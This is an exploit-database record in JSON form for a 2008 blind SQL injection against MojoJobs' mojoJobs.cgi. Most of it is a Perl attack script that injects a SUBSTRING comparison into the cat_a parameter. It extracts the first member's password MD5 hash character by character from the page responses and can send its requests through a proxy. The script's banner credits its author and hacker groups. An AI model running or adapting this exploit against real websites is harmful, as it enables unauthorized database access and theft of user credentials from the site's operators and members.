DATABASE RESOURCES PRICING ABOUT US

{"href": "https://www.seebug.org/vuldb/ssvid-9157", "status": "poc", "bulletinFamily": "exploit", "modified": "2008-07-23T00:00:00", "title": "MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-9157", "cvelist": [], "description": "No description provided by source.", "viewCount": 4, "published": "2008-07-23T00:00:00", "sourceData": "\n #!/usr/bin/perl\r\nuse LWP::UserAgent;\r\nuse Getopt::Long;\r\nif(!$ARGV[1])\r\n{\r\n print " \\n";\r\n print " #################### Viva IslaMe Viva IslaMe ################\\n";\r\n print " # MojoJobs Blind SQL Injection Exploit #\\n";\r\n print " # (mojoJobs.cgi mojo ) #\\n";\r\n print " # Author: Mr.SQL #\\n";\r\n print " # EMAIL : SQL@HOTMAIL.IT #\\n";\r\n print " # #\\n";\r\n print " # -((:: GrE3E3E3E3E3ETZ ::))- #\\n";\r\n print " # #\\n";\r\n print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #\\n";\r\n print " # :: ALwHeD :: milw0rm :: #\\n";\r\n print " # #\\n";\r\n print " # <<>> MuSliMs HaCkErS <<>> #\\n";\r\n print " # #\\n";\r\n print " # HOME: WwW.PaL-HaCkEr.CoM #\\n";\r\n print " # #\\n";\r\n print " # Usage : perl test.pl host #\\n";\r\n print " # Example: perl test.pl www.host.com / -d 10 #\\n";\r\n print " # Options: #\\n";\r\n print " # -d valid cat_a value #\\n";\r\n print " #############################################################\\n";\r\n exit;\r\n}\r\nmy $host = $ARGV[0];\r\nmy $cat_a = $ARGV[2];\r\nmy %options = ();\r\nGetOptions(\\%options, "u=i", "p=s", "d=i");\r\nprint "[~] Exploiting...\\n";\r\nif($options{"b"})\r\n{\r\n $mojo = $options{"b"};\r\n}\r\nsyswrite(STDOUT, "[~] MD5-Hash: ", 14);\r\nfor(my $i = 1; $i <= 32; $i++)\r\n{\r\n my $f = 0;\r\n my $h = 48;\r\n while(!$f && $h <= 57)\r\n {\r\n if(istrue2($host, $cat_a, $i, $h))\r\n {\r\n $f = 1;\r\n syswrite(STDOUT, chr($h), 1);\r\n }\r\n $h++;\r\n }\r\n if(!$f)\r\n {\r\n $h = 97;\r\n while(!$f && $h <= 122)\r\n {\r\n if(istrue2($host, $cat_a, $i, $h))\r\n {\r\n $f = 1;\r\n syswrite(STDOUT, chr($h), 1);\r\n }\r\n $h++;\r\n }\r\n }\r\n}\r\nprint "\\n[~] Exploiting done\\n";\r\nsub istrue2\r\n{\r\n my $host = shift;\r\n my $cat_a = shift;\r\n my $i = shift;\r\n my $h = shift;\r\n \r\n my $ua = LWP::UserAgent->new;\r\n my $query = "http://".$host."mojoJobs.cgi?mojo=1&cat_a=".$cat_a." and (SUBSTRING((SELECT password FROM member LIMIT 0,1),".$i.",1))=CHAR(".$h.")";\r\n \r\n if($options{"p"})\r\n {\r\n $ua->proxy('http', "http://".$options{"p"});\r\n }\r\n \r\n my $resp = $ua->get($query);\r\n my $content = $resp->content;\r\n my $regexp = "tourterms.pdf";\r\n \r\n if($content =~ /$regexp/)\r\n {\r\n return 1;\r\n }\r\n else\r\n {\r\n return 0;\r\n }\r\n}\n ", "id": "SSV:9157", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T21:34:47", "reporter": "Root", "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645519990, "score": 1659785532, "epss": 1678851499}}

{}